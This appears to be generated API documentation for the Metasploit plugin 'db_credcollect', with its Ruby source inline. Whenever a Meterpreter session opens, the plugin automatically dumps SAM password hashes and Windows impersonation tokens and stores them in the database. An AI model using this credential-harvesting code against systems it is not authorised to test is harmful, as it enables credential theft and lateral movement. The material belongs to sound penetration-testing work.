Class: Msf::Plugin::CredCollect

Inherits:
Msf::Plugin
Includes:
SessionEvent
Defined in:
plugins/db_credcollect.rb

Defined Under Namespace

Classes: CredCollectCommandDispatcher

Instance Attribute Summary

Attributes inherited from Msf::Plugin

#opts

Attributes included from Framework::Offspring

#framework

Instance Method Summary

Methods included from SessionEvent

#on_session_command, #on_session_download, #on_session_filedelete, #on_session_interact, #on_session_output, #on_session_upload

Methods inherited from Msf::Plugin

#add_console_dispatcher, create, #flush, #input, #output, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #remove_console_dispatcher

Constructor Details

#initialize(framework, opts) ⇒ CredCollect

Returns a new instance of CredCollect.


# File 'plugins/db_credcollect.rb', line 97

# Plugin load hook. Hands +framework+ and +opts+ up to Msf::Plugin#initialize,
# then registers this plugin as a session-event subscriber (so #on_session_open
# fires for every new session) and installs the CredCollect console commands.
#
# @param framework [Msf::Framework] the running framework instance
# @param opts [Hash] plugin load options, forwarded unchanged to the superclass
def initialize(framework, opts)
  super
  event_bus = self.framework.events
  event_bus.add_session_subscriber(self)
  add_console_dispatcher(CredCollectCommandDispatcher)
end

Instance Method Details

#cleanup ⇒ Object


# File 'plugins/db_credcollect.rb', line 103

# Plugin unload hook: stop receiving session events and remove the
# 'credcollect' console command dispatcher that #initialize installed.
#
# @return [void]
def cleanup
  event_bus = self.framework.events
  event_bus.remove_session_subscriber(self)
  remove_console_dispatcher('credcollect')
end

#desc ⇒ Object


# File 'plugins/db_credcollect.rb', line 112

# One-line description shown by the plugin loader.
#
# @return [String]
def desc
  'Automatically grabs hashes and tokens from meterpreter session events and stores them in the db'
end

#name ⇒ Object


# File 'plugins/db_credcollect.rb', line 108

# Plugin name as used by `load`/`unload` in the console.
#
# @return [String]
def name
  'db_credcollect'
end

#on_session_close(session, reason = '') ⇒ Object


# File 'plugins/db_credcollect.rb', line 94

# Session-close hook from SessionEvent. CredCollect keeps no per-session
# state, so there is nothing to tear down here; the body is intentionally
# empty and the method returns nil.
#
# @param session [Msf::Session] the session being closed (unused)
# @param reason [String] close reason supplied by the framework (unused)
# @return [nil]
def on_session_close(session, reason = '')
  # no-op
end

#on_session_open(session) ⇒ Object


# File 'plugins/db_credcollect.rb', line 42

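# Session-open hook: dump SAM hashes and impersonation tokens from a fresh
# Meterpreter session and record them in the framework database.
#
# Nothing is collected unless the database is active, and only Meterpreter
# sessions are handled (the priv and incognito extensions are loaded onto the
# session for the dump). Each SAM entry becomes an auth_info record keyed on
# the session's peer address and port 445; each token line becomes an
# smb_token note.
#
# @param session [Msf::Session] the session that just opened; read for
#   #type, #core, #priv, #incognito and #sock.peerhost
# @return [void]
def on_session_open(session)
  # Nowhere to store anything without a live db connection.
  return unless framework.db.active

  print_status("This is CredCollect, I have the conn!")

  # priv/incognito only exist for Meterpreter; any other session type is
  # logged above and otherwise ignored.
  return unless session.type == "meterpreter"

  # Make sure we're rockin Priv and Incognito
  session.core.use("priv")
  session.core.use("incognito")

  # Target infos for the db record. NOTE(review): peerhost is the address the
  # session socket sees; for pivoted or NAT'd sessions that may not be the
  # host the SAM belongs to — confirm before relying on it for correlation.
  addr = session.sock.peerhost
  # This ought to read from the exploit's datastore.
  # Use the meterpreter script if you need to control it.
  smb_port = 445

  # Record hashes to the running db instance: one auth_info row per account,
  # with the password field holding the dumped "LM:NTLM" pair. Reading the SAM
  # presumably needs elevated privileges on the target; a failure there
  # propagates to the event dispatcher unchanged.
  session.priv.sam_hashes.each do |hash|
    record = {
      host: addr,
      port: smb_port,
      sname: 'smb',
      user: hash.user_name,
      pass: "#{hash.lanman}:#{hash.ntlm}",
      type: "smb_hash",
      active: true
    }
    framework.db.report_auth_info(record)
  end

  # Record user tokens. incognito hands back one formatted multi-line string
  # per token class, so flatten them to one token per line. Use strip, not
  # strip!: the bang form returns nil when there is nothing to remove, which
  # made the chained split raise NoMethodError. Blank lines between token
  # classes are dropped rather than stored as empty notes.
  token_lines = session.incognito.incognito_list_tokens(0).values.join.strip.split("\n")
  token_lines.reject(&:empty?).each do |token|
    note = {
      host: addr,
      type: 'smb_token',
      data: token,
      # presumably dedupes notes carrying identical data — verify against report_note
      update: :unique_data
    }
    framework.db.report_note(note)
  end
end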